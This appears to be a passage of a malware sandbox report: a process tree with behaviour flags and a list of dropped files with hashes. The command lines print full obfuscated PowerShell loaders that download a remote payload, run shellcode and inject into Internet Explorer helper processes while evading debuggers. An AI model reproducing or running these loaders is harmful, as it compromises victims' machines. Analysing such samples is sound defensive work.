2JBP3G9 1 EK0E4T2i0R0K4U0A2T2FDS5 9K5 0r5M8C2 B 3 9 1 E 0l4 2A0 0 4 0p2 2 D 5B9w5I9 5F9 ' ; .P( `$WAFn s kDuSeD7 )H `$ X yLl oMg rBaBfLiNeW0U2C; `$ARVeSa l i tn7 =B TX ySlAoBgNrGaBfTiAe 1N1U 'U5C4b3 DR1 FN1H4G1P8 1F1A5R0O4RD 5 0G5 4S2 6s1N5P1C4 1ABO1 5P5 EB3 9 1UEr0 6 1 FT1 B 1M5E5 8S4N0 5S9e' ; . (S`$DA nisfk uUeK7N) r`$ R e a lTi t 7 ;e`$bRVeCa l iCtj7 =H XEyGlSo gSr aDf iIeT1F1 F' 5B4 3D6 1N5R0 2 0 6 1 9O1 4q5 EK3 9u1AE 0 6S1AFP1 BK1R5W5 8H5 4 3IDM1AFO1S4 1 8F1 1r5 C 5 0 4 0 5V9A' ; . (C`$ AFn sSkAu e 7S)r `$TR eMaUlai ti7 ; `$BRDeTaHl iMtG6U V=l BX y lFo gBr a fiiMe 1P1U s' 5H4S2L0 1 5I0O2U0 3S0 0S5 0E4 DS5H0L2 BD2 3A0H9I0 3I0P4s1P5P1IDO5UE 2G2S0V5C1 EF0Z4R1D9N1 DA1C5G5TE 3S9 1BEL0 4 1T5 0P2 1mFM0S0P2H3 1 5 0V2 0 6F1 9C1 3A1J5S0D3 5 Eo3FDU1E1 0 2 0 3 1 8N1 1E1AC 2EDS4 AM4MA 3L7P1L5 0 4R3K4B1a5r1MCF1 5 1 7 1 1D0p4 1 5J3 6M1AFJ0C2 3T6 0G5 1TEU1t3 0 4 1 9 1SFB1 ET2 0U1SF 1 9C1 E 0V4O1S5B0 2L5P8 5F8V1K6S1IBS0P0C5T0 5G4U2 3 1SBT0 9F1iCl1D9 0B4 1PE 1 5F1PF 5S0d5 4 3 1 1EET0S3 1IBm0G5k1S5S4B4L5 9 5TCS5 0 5T8S3M7 3 4 2H4B5M0 3 0 5S8d2LB 3F9F1 EH0R4B2S0E0C4U0S2 2OD 5 CP5f0 2BB 2K5S3 9 1REN0R4R4H3 4B2D2 D 5 C 5d0C2 Bs2 5S3 9N1AE 0S4P4 3 4T2H2 D 5 C 5 0N2 B 2T5 3 9F1 EV0K4a4S3 4 2 2uDP5 9S5 0 5U8A2KBR3 9D1 EL0G4 2 0W0 4 0A2C2 DF5d9B5 9R5 9 'D;S. (F`$TA nFsPkSu eP7K) P`$ R eFaOl iGt 6 ; `$ UBn p r eSauc = AfSk p G`$UAKnFsUkSu eR5A `$ A nCs k uCeH6u;M`$TROe aRlai tK7T S=C WXsyNlUoDgAr aEfAiTeS1S1 'F5 4 0W0K1F9 0D4H1V6 1 9 1P5 4S3 5S0 4 DC5A0i5E4R2 0 1 5B0 2 0V3 0 0 5UEK3H9b1AE 0B6 1HFT1CB 1U5c5C8 2BBH3p9 1TE 0 4C2 0R0T4M0e2S2UDS4HAS4 AU2 A 1 5R0 2 1 FJ5ECT5 0 4M6T4 6T4 3P5LCS5 0S4F0S0n8D4R3t4I0a4 0 4 0 5 C 5 0 4 0 0R8P4 4 4 0 5 9T'O;O. (I`$ AGn sNkTu e 7 )F `$ RDeha lCi tU7 ;P`$ RSe aPlsift 8 F=P AX yRl oVgSraa fSi eZ1B1R 'O5O4 3LD 0E5I1 C 0B4V1O9 1S7 0 2 1 1 1 E 5S0 4SDB5 0 5R4 2T0m1 5T0 2P0A3 0 0C5IEU3 9S1 E 0G6P1PFB1 BD1 5T5 8F2 B 3 9U1KE 0 4I2B0K0 4 0A2c2 D 4BAL4RAT2lAF1P5S0 2C1 FB5oC 5D0U4L2D4H2B4 2 4S1S4s2U4N6 4 0 4T8F5 C 5I0F4 0a0C8U4 3 4w0 4 0M4 0B5 CS5O0M4 0S0O8 4S4R5N9K'P;E.c(S`$ A nUs kTuBeA7D) H`$CRFeHaMlTi tB8F;L`$ XKyIlUo g rGaSfBi eJ0U1 S=S AXiyDlGoMgKrAaPf iLe 1 1T 'F1 8p0 4T0O4E0 0G4 A 5BF 5IFD0 2L1 FB1LFC0Y4i1 DS1 1V1 9 1RC 4S1 4 2 4 3H5AE 1 7L1 9R0 4P1 8M0R5S1e2F5 E 1V9S1 FM5GF 3RDP0u9 2B3 1 9a0 4V1 5P5 FW2R4 1 1U1 C 1S5 0P3 1SDC5 E 0 5O4S3b4S2T'V;T`$KXDy l oRg r a f i eE0U0 =S XGy lEo gFrOaEf iPeF1 1M 'U5S4V2 2 1e5 1K4P1V9S0 2S5S0 4GDS5K0 5 8H3 EH1P5 0D7F5 DB3 F 1 2M1 AO1C5A1d3B0C4P5I0 3 EA1M5 0T4 5 Es2 7 1d5 1O2I3 3P1ECc1E9 1 5M1IEF0 4R5 9 5WE 3F4I1 F 0M7B1TE 1 CF1SFV1F1i1F4 2E3F0 4D0 2 1 9 1IEP1 7R5 8 5 4S2L8R0 9 1 CC1DFM1T7R0M2 1T1S1Y6 1 9B1 5 4B0 4S1A5 9F' ; `$KRFe aElRist 8 F=M NXHy lFo gTrPaEfTiPe 1S1 'I5 4 0 0S1 9f0 4T1S6 1S9 1O5 4 2 4 DM5 4 1S5 1BE 0S6S4DAS1 1S0G0 0R0 1L4 1E1D0S4M1 1O'H; .Y( `$ AKnAs k uIe 7 ) U`$ER e a lAi t 8 ; `$NpSiTtUfNi eh2N= `$PpUi tMf i eR2B+I'S\ AAumg u sAtOeFpArS.FCRa mS'U;K`$ARPeSdOi rG= 'K' ; iCfM B(U-BnFo t (HTFe sNt -OPTa t hE M`$ p iUtSf iSe 2I) )D b{ wIh iSlceI c( `$ R e d iUr -Ge q 'a'D)G C{C. (T`$AAJn s kSuHeT7 )S O`$UX yPlHo gMrKaSfRiTe 0A0F;FSTtaa r tD-TSAlCeTe pO 5G; } SSeztA- CFoJnEt eNnAtV `$SpFi t fPiPeS2F P`$ RAefdKi rH;T} `$RRSe dBiNr =F WGUeDtB- C oUnDtBeAnIt `$GpAi tKfUiFeM2P;P`$ RDe a lSi tD9 C=T XayAlEo gBrSa f i e 1 1P A' 5p4O2B2I1 5 1 1 1 Cr1 9s0S4V5 0M4 DI5I0 2BBA2 3P0H9U0E3 0 4 1 5U1RDH5TEF3L3 1AFT1 E 0N6G1V5 0 2 0B4H2 DP4 AS4 A 3A6C0F2 1eFr1ADS3D2T1P1F0W3 1M5F4f6B4F4H2 3A0 4h0 2 1b9 1 E 1 7K5M8B5G4I2 2 1 5T1E4S1B9 0K2r5 9S' ; .C(R`$BA nTsMk ueeS7 ) E`$SRAeKa lOiotL9 ;K`$ REeSd iKrV0 =i XByFlUo g r a f iRe 1 1 C'M2fBT2S3C0M9A0S3 0 4 1 5W1CD 5 E 2 2S0 5F1LES0M4U1 9H1PDE1 5B5 EL3 9E1 EV0M4U1 5 0 2 1UF 0 0P2 3C1 5P0N2 0T6 1M9T1 3p1M5M0P3 5GEA3ND 1 1 0E2A0 3A1U8 1S1C1 C 2jD 4PA 4 A 3 3A1MFF0E0T0 9 5 8 5H4F2 2r1 5S1T1h1SCC1 9 0F4B5FCM5l0 4 0 5MCK5 0B5A0S5 4 0F0I1 9S0 4M1 6 1k9 1S5 4C3I5 C 5N0 4T6H4 6 4 3 5 9 ' ; . ( `$PAPn sBk uCeS7 ) `$BRCeMd i rK0F; `$Ss c eCn aVrDiBu mVsU=p`$FRBeWaWlPiRtI.FcKoFuAnFt -O6 6 3D;C`$VRHe dci r 1 M=B X y lHosg rOa f i e 1 1K P' 2 BK2 3S0I9 0 3 0M4 1B5H1SDM5BET2R2S0 5U1 E 0L4 1 9F1 DS1 5S5 E 3 9 1SEO0L4N1F5C0 2K1 F 0b0 2P3 1H5 0U2O0V6 1F9T1F3O1 5K0 3 5SEI3 DR1e1K0t2 0 3 1G8F1B1 1YCS2 DB4GAg4 AR3P3S1DFL0 0A0 9 5T8 5d4A2 2P1L5b1 1o1 C 1 9T0A4 5CCO5 0 4A6 4E6 4 3 5 CK5U0 5 4 3FDT0U5E1PC 0H4I1D9 1 7 0C2b1C1m1PED5ECT5M0O5 4I0S3U1M3 1 5N1OEU1 1R0 2 1U9 0 5 1 D 0k3S5 9D'T;B.A(G`$KA n s k uReR7d)V `$MRJeCd i rU1 ;D`$SRseMd iTrO2T B= X yVl o gLrPaAf iSeS1f1G s'P5 4A3 ES1SFD1 E 0 3G1 3E1F5T1 ED5O0B4TD 5 0K2 BS2A3F0 9 0Q3S0 4S1 5 1HD 5DE 2R2C0 5S1UEC0 4L1F9N1GDS1 5B5OEC3 9U1WEF0 4G1 5B0 2r1 FI0A0 2 3 1B5K0 2R0F6 1 9S1D3 1 5 0N3T5IET3 Dr1S1 0G2S0 3Z1s8R1B1 1 CS2 D 4 AF4 AF3V7 1T5K0S4 3 4A1C5S1 CA1 5U1H7M1 1B0s4D1 5G3C6K1RF 0K2O3 6S0 5P1 E 1 3s0E4 1V9P1 F 1UEJ2 0 1DF 1U9 1LE 0 4A1U5N0R2U5 8F5 8 1S6 1 B 0F0 5E0 5T4 2W5 1 4A0S3V0T0S1S1G0S2 1 5 1TEC1 4s5S0 5 4P3L8 1M1 0b6S1 5G0U2 5K9m5rC 5 0P5F8R3 7 3L4C2T4 5 0 3s0S5 8 2RBB3P9o1 EF0 4 2P0 0 4S0A2F2 D 5uC 5S0S2FBA3 9 1SEI0N4B2P0D0R4S0P2 2 DK5 C 5 0R2 B 3O9f1 EL0R4D2B0h0 4 0 2F2ADI5HC 5S0 2nB 3T9 1TE 0 4 2s0A0 4 0C2 2SDM5TC 5 0T2 B 3M9S1 E 0F4A2 0S0 4 0 2B2aDh5I9S5B0M5i8 2MB 3 9R1 EE0O4 2 0 0 4U0 2 2ODB5B9D5A9 5S9W'S; . (W`$ ALn s k u e 7 )T `$ARCeJdSiFrs2A; `$CRDeDd isr 3 N=V DXMyTlPoRg r aFfBiUe 1V1 'P5O4 3SEM1 F 1EEM0S3K1 3 1U5 1WE 5KEH3 9n1FEF0O6 1 FS1RBS1 5O5m8F5W4 0 0 1P9C0G4 1 6S1W9N1 5M4 3S5 C 5F4H3 DS0 5C1BCK0 4L1 9M1 7O0T2 1O1T1 EA5BC 5A4B2 5O1 Et0S0A0 2B1K5F1C1 1e3O5BC 4G0P5 C 4K0K5S9 'V; . ( `$ AHnssCk uDe 7Y)I V`$AR ePdSiMr 3N#U;""";Function Redir9 { param([String]$Gruneri); $Lokal = 's'+'ubstrin'+'g'; For($Tamk=1; $Tamk -lt $Gruneri.Length-1; $Tamk+=(1+1)){$Xylografie = $Xylografie + $Gruneri.$Lokal.Invoke($Tamk, 1)}; $Xylografie;}$Contai0 = Redir9 ' I EDX ';$Contai1= Redir9 $Tjen;if([IntPtr]::size -eq 8){.$env:systemroot\*ysw*64\*indo*ower*\v1.*\po*ll.exe $Contai1 ;}else{.$Contai0 $Contai1;}"
                                                3⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1940
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Xylografie11 { param([String]$Gruneri); $Dubsdeades = ''; Write-Host $Dubsdeades; Write-Host $Dubsdeades; Write-Host $Dubsdeades; $Letdownsg = New-Object byte[] ($Gruneri.Length / 2); For($Tamk=0; $Tamk -lt $Gruneri.Length; $Tamk+=2){ $Pyralidtap = 'sub'+'string'; $Engleligee = $Gruneri.$Pyralidtap.Invoke($Tamk, 2); $Letdownsg[$Tamk/2] = [convert]::ToByte($Engleligee, 16); $Sandsi = ($Letdownsg[$Tamk/2] -bxor 112); $Letdownsg[$Tamk/2] = $Sandsi; } [String][System.Text.Encoding]::ASCII.GetString($Letdownsg);}$Trias0=Xylografie11 '23090304151D5E141C1C';$Trias1=Xylografie11 '3D1913021F031F16045E27191E43425E251E031116153E11041906153D1504181F1403';$Trias2=Xylografie11 '37150420021F1331141402150303';$Trias3=Xylografie11 '23090304151D5E22051E04191D155E391E0415021F0023150206191315035E38111E141C15221516';$Trias4=Xylografie11 '030402191E17';$Trias5=Xylografie11 '3715043D1F14051C1538111E141C15';$Trias6=Xylografie11 '22242300151319111C3E111D155C503819141532092319175C502005121C1913';$Trias7=Xylografie11 '22051E04191D155C503D111E11171514';$Trias8=Xylografie11 '2215161C151304151434151C1517110415';$Trias9=Xylografie11 '391E3D151D1F02093D1F14051C15';$Anskue0=Xylografie11 '3D0934151C151711041524090015';$Anskue1=Xylografie11 '331C1103035C502005121C19135C502315111C15145C50311E0319331C1103035C503105041F331C110303';$Anskue2=Xylografie11 '391E061F1B15';$Anskue3=Xylografie11 '2005121C19135C503819141532092319175C503E1507231C1F045C502619020405111C';$Anskue4=Xylografie11 '2619020405111C311C1C1F13';$Anskue5=Xylografie11 '1E04141C1C';$Anskue6=Xylografie11 '3E0420021F041513042619020405111C3D151D1F0209';$Anskue7=Xylografie11 '393528';$Anskue8=Xylografie11 '2C';$Udsparend=Xylografie11 '252335224342';$Haver=Xylografie11 '33111C1C27191E141F0720021F1331';function fkp {Param ($Frem, $Plettendes) ;$Realit0 =Xylografie11 '54201C1F0503191F1302504D50582B310000341F1D11191E2D4A4A33050202151E04341F1D11191E5E371504310303151D121C1915035859500C5027181502155D3F121A151304500B50542F5E371C1F12111C310303151D121C093311131815505D311E1450542F5E3C1F131104191F1E5E23001C19045854311E031B051548592B5D412D5E350105111C03585424021911034059500D595E37150424090015585424021911034159';.($Anskue7) $Realit0;$Realit5 = Xylografie11 '5434151D091E1F1E15504D5054201C1F0503191F13025E3715043D1504181F1458542402191103425C502B240900152B2D2D503058542402191103435C50542402191103445959';.($Anskue7) $Realit5;$Realit1 = Xylografie11 '02150405021E505434151D091E1F1E155E391E061F1B1558541E051C1C5C5030582B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E38111E141C152215162D583E15075D3F121A1513045023090304151D5E22051E04191D155E391E0415021F0023150206191315035E38111E141C1522151658583E15075D3F121A15130450391E04200402595C505854201C1F0503191F13025E3715043D1504181F14585424021911034559595E391E061F1B1558541E051C1C5C503058543602151D595959595C5054201C150404151E1415035959';.($Anskue7) $Realit1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Zeline,[Parameter(Position = 1)] [Type] $Elendiges = [Void]);$Realit2 = Xylografie11 '5422151C1917191F504D502B310000341F1D11191E2D4A4A33050202151E04341F1D11191E5E341516191E1534091E111D1913310303151D121C0958583E15075D3F121A1513045023090304151D5E2215161C151304191F1E5E310303151D121C093E111D15585424021911034859595C502B23090304151D5E2215161C151304191F1E5E351D19045E310303151D121C093205191C1415023113131503032D4A4A22051E595E341516191E1534091E111D19133D1F14051C1558542402191103495C505416111C0315595E341516191E15240900155854311E031B0515405C5054311E031B0515415C502B23090304151D5E3D051C04191311030434151C15171104152D59';.($Anskue7) $Realit2;$Realit3 = Xylografie11 '5422151C1917191F5E341516191E15331F1E0304020513041F0258542402191103465C502B23090304151D5E2215161C151304191F1E5E33111C1C191E17331F1E06151E04191F1E032D4A4A2304111E141102145C50542A151C191E15595E231504391D001C151D151E041104191F1E361C111703585424021911034759';.($Anskue7) $Realit3;$Realit4 = Xylografie11 '5422151C1917191F5E341516191E153D1504181F145854311E031B0515425C5054311E031B0515435C5054351C151E14191715035C50542A151C191E15595E231504391D001C151D151E041104191F1E361C111703585424021911034759';.($Anskue7) $Realit4;$Realit5 = Xylografie11 '02150405021E505422151C1917191F5E330215110415240900155859';.($Anskue7) $Realit5 ;}$Skylitneo = Xylografie11 '1B15021E151C4342';$Xylografie03 = Xylografie11 '371504331F1E031F1C1527191E141F07';$Xylografie00=Xylografie11 '23181F0727191E141F07';$Xylografie01 = Xylografie11 '54361502061914504D502B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A37150434151C1517110415361F0236051E1304191F1E201F191E0415025858161B005054251403001102151E14505428091C1F1702111619154040595C50583734245030582B391E042004022D5C502B25391E0443422D5950582B391E042004022D595959';.($Anskue7) $Xylografie01;$Xylografie02 = Xylografie11 '542615141B15504D502B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A37150434151C1517110415361F0236051E1304191F1E201F191E0415025858161B005054231B091C19041E151F505428091C1F1702111619154043595C50583734245030582B391E042004022D5950582B391E042004022D595959';.($Anskue7) $Xylografie02;$Realit7 = Xylografie11 '543D1F141811504D50542615141B155E391E061F1B15584059';.($Anskue7) $Realit7;$Realit7 = Xylografie11 '543615020619145E391E061F1B1558543D1F1418115C504059';.($Anskue7) $Realit7;$Realit6 = Xylografie11 '542015020300504D502B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A37150434151C1517110415361F0236051E1304191F1E201F191E0415025858161B005054231B091C19041E151F5054311E031B051544595C50583734245030582B391E042004022D5C502B25391E0443422D5C502B25391E0443422D5C502B25391E0443422D5950582B391E042004022D595959';.($Anskue7) $Realit6;$Unpreac = fkp $Anskue5 $Anskue6;$Realit7 = Xylografie11 '5400190416191543504D505420150203005E391E061F1B15582B391E042004022D4A4A2A15021F5C504646435C504008434040405C504008444059';.($Anskue7) $Realit7;$Realit8 = Xylografie11 '543D051C04191702111E504D505420150203005E391E061F1B15582B391E042004022D4A4A2A15021F5C5042424241424640485C504008434040405C5040084459';.($Anskue7) $Realit8;$Xylografie01 = Xylografie11 '180404004A5F5F021F1F041D11191C4142435E1719041805125E191F5F3D09231904155F24111C15031D5E054342';$Xylografie00 = Xylografie11 '542215141902504D50583E15075D3F121A151304503E15045E271512331C19151E04595E341F071E1C1F1114230402191E17585428091C1F170211161915404159';$Realit8 = Xylografie11 '54001904161915424D54151E064A11000014110411';.($Anskue7) $Realit8;$pitfie2=$pitfie2+'\Augustepr.Cam';$Redir='';if (-not(Test-Path $pitfie2)) {while ($Redir -eq '') {.($Anskue7) $Xylografie00;Start-Sleep 5;}Set-Content $pitfie2 $Redir;}$Redir = Get-Content $pitfie2;$Realit9 = Xylografie11 '542215111C1904504D502B23090304151D5E331F1E061502042D4A4A36021F1D321103154644230402191E175854221514190259';.($Anskue7) $Realit9;$Redir0 = Xylografie11 '2B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A331F000958542215111C19045C50405C505054001904161915435C5046464359';.($Anskue7) $Redir0;$scenariums=$Realit.count-663;$Redir1 = Xylografie11 '2B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A331F000958542215111C19045C504646435C50543D051C04191702111E5C50540313151E110219051D0359';.($Anskue7) $Redir1;$Redir2 = Xylografie11 '543E1F1E0313151E504D502B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A37150434151C1517110415361F0236051E1304191F1E201F191E0415025858161B005054251403001102151E1450543811061502595C50583734245030582B391E042004022D5C502B391E042004022D5C502B391E042004022D5C502B391E042004022D5C502B391E042004022D5950582B391E042004022D595959';.($Anskue7) $Redir2;$Redir3 = Xylografie11 '543E1F1E0313151E5E391E061F1B155854001904161915435C543D051C04191702111E5C54251E00021511135C405C4059';.($Anskue7) $Redir3#"
                                                  4⤵
                                                  • Blocklisted process makes network request
                                                  • Checks QEMU agent file
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: MapViewOfSection
                                                  PID:2964
                                                  • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                    "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                    5⤵
                                                      PID:3404
                                                    • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                      "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                      5⤵
                                                        PID:3632
                                                      • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                        "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                        5⤵
                                                          PID:2256
                                                        • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                          "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                          5⤵
                                                            PID:1164
                                                          • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                            "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                            5⤵
                                                              PID:1120
                                                            • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                              "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                              5⤵
                                                                PID:1816
                                                              • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                5⤵
                                                                  PID:2804
                                                                • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                  "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                  5⤵
                                                                    PID:4892
                                                                  • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                    "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                    5⤵
                                                                      PID:644
                                                                    • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                      "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                      5⤵
                                                                        PID:2232
                                                                      • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                        "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                        5⤵
                                                                          PID:316
                                                                        • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                          5⤵
                                                                          • Checks QEMU agent file
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:3636
                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Error.pdf"
                                                                            6⤵
                                                                              PID:5024
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5860 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:2
                                                                      2⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1524
                                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                    1⤵
                                                                      PID:1944
                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                      C:\Windows\system32\AUDIODG.EXE 0x41c 0x468
                                                                      1⤵
                                                                        PID:2128

                                                                      Network

                                                                            MITRE ATT&CK Enterprise v6

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\9c137115-3302-430b-b8bf-3fdf187798b3.tmp

                                                                              Filesize

                                                                              114KB

                                                                              MD5

                                                                              5ff494068b80a8103350f815cbbc554f

                                                                              SHA1

                                                                              b3467ac09614dfc4437cf040b10397ca19bbd448

                                                                              SHA256

                                                                              bab77fca8164ae3620ef0152e03d3cc5e50e215916d2bfc5ecd519f0dbfefa5e

                                                                              SHA512

                                                                              fedb3311edff750b951ee044be2db010228aa068ea9e4a491e0f91a02bbf6660a214c88179a4de0e7862ceeb847eaf251bff18e844e7efdf3066d651c5eafbfe

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                              Filesize

                                                                              168B

                                                                              MD5

                                                                              b20581dd1f003adb657a7b58cc042783

                                                                              SHA1

                                                                              87dd48250c51245333f1ff1398698e18692caa66

                                                                              SHA256

                                                                              5b8ba4ae2ef0237c346d44dbc1a3ead49995cea5ac0f4eb0079ccd56cfc5fc7b

                                                                              SHA512

                                                                              9c3644e196a075cbe4801c7df60528b7b4a6d5c1acfbe4eb077a911ae25739accfbf9704b2d6eb72a65e29d6d311f52642fa8dc7068f0fa543b1a1b3db59e1f4

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                              Filesize

                                                                              216B

                                                                              MD5

                                                                              fefefe7e56e2244dcd7464e3d620d445

                                                                              SHA1

                                                                              e77555dc0042ecbeea54a859081700de46afb4c9

                                                                              SHA256

                                                                              b1cd7c7aea42a23922bed0e5a8997ac0b0fd77691d3976caabcf118d7be236de

                                                                              SHA512

                                                                              15ec393c1be40cfd38375df17ed7fde163eea15c58c3fc7d612a68ced0d8a2044272b7805213ff466a43286e4311aacb0410ba9b4b874342b1b9abba9ce0de94

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                              Filesize

                                                                              120B

                                                                              MD5

                                                                              81397e02a08b1c746b8a26bc56a7f28f

                                                                              SHA1

                                                                              fcb404fcef11b34743f7f0a20a98fb0b1afcd869

                                                                              SHA256

                                                                              8960cd01987824398758c3e81000f74ad047c8b2c0dd2a8dc4bb9b34b8efcb31

                                                                              SHA512

                                                                              0241ad8bd441059a831f55acbdae51ee2ad0b8f67c734b609d17335bc0780b9c75822a960993da335149e2a0065080fe82c6f656f990511c39c15f1469bec0ed

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\MANIFEST-000001

                                                                              Filesize

                                                                              41B

                                                                              MD5

                                                                              5af87dfd673ba2115e2fcf5cfdb727ab

                                                                              SHA1

                                                                              d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                              SHA256

                                                                              f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                              SHA512

                                                                              de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\Origins\CURRENT

                                                                              Filesize

                                                                              16B

                                                                              MD5

                                                                              46295cac801e5d4857d09837238a6394

                                                                              SHA1

                                                                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                              SHA256

                                                                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                              SHA512

                                                                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                              Filesize

                                                                              3KB

                                                                              MD5

                                                                              3276044ef181e412946c2196af05954b

                                                                              SHA1

                                                                              a7454fe92ba4fa32463efe5be034795c0ffe5f8c

                                                                              SHA256

                                                                              771e8b521e28d68162d09caa8045b28c01bbf21732ce84d60b0a6104a7bc8882

                                                                              SHA512

                                                                              c3e01e5414c36bc074fa5849af52db5c53e4542cc88d03a8568137a2b5cf268bf27db3ed241c99e405df077d5f86724d6de991df5a6f4ebf08c4883b9744469e

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                              Filesize

                                                                              2KB

                                                                              MD5

                                                                              1906fd5626513ffa0237f951bc79f627

                                                                              SHA1

                                                                              75848f80ed6ef8ec40b425ef507af73db5f24bf9

                                                                              SHA256

                                                                              c41d2cd736c1539980f14fbf0e46838336373d7433416acad79728bef9dd6f0f

                                                                              SHA512

                                                                              c73382f98561f10eccbf920f4084d27333f1ecfe4d3bbe9fb9fcc4b7d0ae31b0d5e3bd271ec09356ac10b274cc03d5b5fcf6e4afa2cbc490db049b3b8b9a3976

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              2a45b2e6d5047350eaf612793e876cf8

                                                                              SHA1

                                                                              0557da52bd7661e44368b6f466f85d4f66d81f5b

                                                                              SHA256

                                                                              6d9f8977998b74b4cccfa8b6973c34220012aafc9eeb1e6f80ce0ab673a4ab7e

                                                                              SHA512

                                                                              1c3f2c22615502b92d2491478f840a507b28959c37bed8f8bd96590dc41fb06d419ecb15b070b84c8680cf9ab32da88f16e9933bdb9c63423473c77a6a6d6711

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              daf4a6d6c510d9032d8ddfb3483668ff

                                                                              SHA1

                                                                              a38659a076e262e6450b887dec6ecd7ac03787ae

                                                                              SHA256

                                                                              b6f33f36887eace6aff535a40731540c08ae8440d7cf20a3d2774339eec02530

                                                                              SHA512

                                                                              2d45a1b83e7c45f2af21b6201ff66c889a269497a32678ab0a3e9f2543408a2e7cf8fad5c37c9391ce49ae99c68aff7707379ad76298303c01318f3a067c6a09

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              1d41af5e0cfa6a9dfc1d09c5218e6338

                                                                              SHA1

                                                                              ac27b7c0a1a62b5d826b6e4593da3a2f9a6fc166

                                                                              SHA256

